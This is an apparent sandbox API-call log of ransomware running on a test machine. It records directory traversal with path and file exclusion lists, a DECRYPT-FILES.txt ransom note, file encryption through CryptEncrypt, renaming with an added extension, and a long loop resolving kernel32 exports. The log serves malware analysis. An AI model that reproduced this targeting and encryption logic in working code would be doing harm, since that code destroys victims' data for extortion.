[0086.210] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.210] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.210] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.210] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.210] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.210] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp") returned 53 [0086.210] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp.DhZVP") returned 59 [0086.210] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ggxu.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\gGxu.bmp.DhZVP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ggxu.bmp.dhzvp"), dwFlags=0x0) returned 1 [0086.211] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.211] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.211] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.211] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92c8fc0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0x2dbd4f70, ftLastAccessTime.dwHighDateTime=0x1d4cf7d, ftLastWriteTime.dwLowDateTime=0x2dbd4f70, ftLastWriteTime.dwHighDateTime=0x1d4cf7d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="h371", cAlternateFileName="")) returned 1 [0086.211] lstrcmpW (lpString1="h371", lpString2=".") returned 1 [0086.212] lstrcmpW (lpString1="h371", lpString2="..") returned 1 [0086.212] lstrcatW (in: lpString1="h371", lpString2="\\" | out: lpString1="h371\\") returned="h371\\" [0086.212] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Program Files") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch=":\\Windows") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Games\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Tor Browser\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\ProgramData\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\All Users") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\IETldCache\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\Local Settings\\") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="\\AppData\\Local") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="AhnLab") returned 0x0 [0086.212] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0086.212] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.212] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.212] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\jkbimi8.tmp") returned 62 [0086.212] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x428 [0086.213] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.213] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0086.213] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\DECRYPT-FILES.txt") returned 68 [0086.213] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0086.213] WriteFile (in: hFile=0x42c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0086.214] CloseHandle (hObject=0x42c) returned 1 [0086.214] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.214] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\*" [0086.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92c8fc0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0xaf94b8a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf94b8a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b18 [0086.215] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.215] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92c8fc0, ftCreationTime.dwHighDateTime=0x1d4d191, ftLastAccessTime.dwLowDateTime=0xaf94b8a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf94b8a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.215] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.215] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.215] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86a04da0, ftCreationTime.dwHighDateTime=0x1d4d4c7, ftLastAccessTime.dwLowDateTime=0x2eec20f0, ftLastAccessTime.dwHighDateTime=0x1d4c605, ftLastWriteTime.dwLowDateTime=0x2eec20f0, ftLastWriteTime.dwHighDateTime=0x1d4c605, nFileSizeHigh=0x0, nFileSizeLow=0xa3fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="41ny.bmp", cAlternateFileName="")) returned 1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="DECRYPT-FILES.txt") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="autorun.inf") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="boot.ini") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="desktop.ini") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="ntuser.dat") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="iconcache.db") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="bootsect.bak") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="ntuser.dat.log") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="thumbs.db") returned -1 [0086.215] lstrcmpiW (lpString1="41ny.bmp", lpString2="Bootfont.bin") returned -1 [0086.215] lstrlenW (lpString="41ny.bmp") returned 8 [0086.215] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.215] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.215] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.215] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.215] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned 50 [0086.215] lstrlenW (lpString="41ny.bmp") returned 8 [0086.215] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\" [0086.215] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\", lpString2="41ny.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp" [0086.215] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.215] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\h371\\41ny.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\h371\\41ny.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0086.216] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=41982) returned 1 [0086.216] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0086.216] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.216] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.216] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.216] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.216] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0086.217] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.218] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.218] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.218] CloseHandle (hObject=0x43c) returned 1 [0086.218] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.219] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0086.219] CloseHandle (hObject=0x0) returned 0 [0086.219] CloseHandle (hObject=0x438) returned 1 [0086.219] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.220] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.220] GetTickCount () returned 0x114e022 [0086.220] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.220] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.220] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.220] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.221] lstrlenA (lpString="kernel32.dll") returned 12 [0086.221] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.221] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.221] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.221] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.221] lstrlenA (lpString="ADDATOMA") returned 8 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.221] lstrlenA (lpString="ADDATOMW") returned 8 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.221] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.221] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.221] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.221] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.221] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.221] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.221] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.222] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.222] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.222] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.222] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.222] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.222] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.222] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.222] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.222] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.222] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.222] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.222] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.222] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.222] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.222] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.222] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.222] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.222] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.222] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.222] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.223] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.223] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.223] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.223] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.223] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.223] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.223] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.223] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.223] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.223] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.223] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.223] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.223] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.223] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.223] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.223] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.223] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.223] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.223] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.224] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.224] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.224] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.224] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.224] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.224] lstrlenA 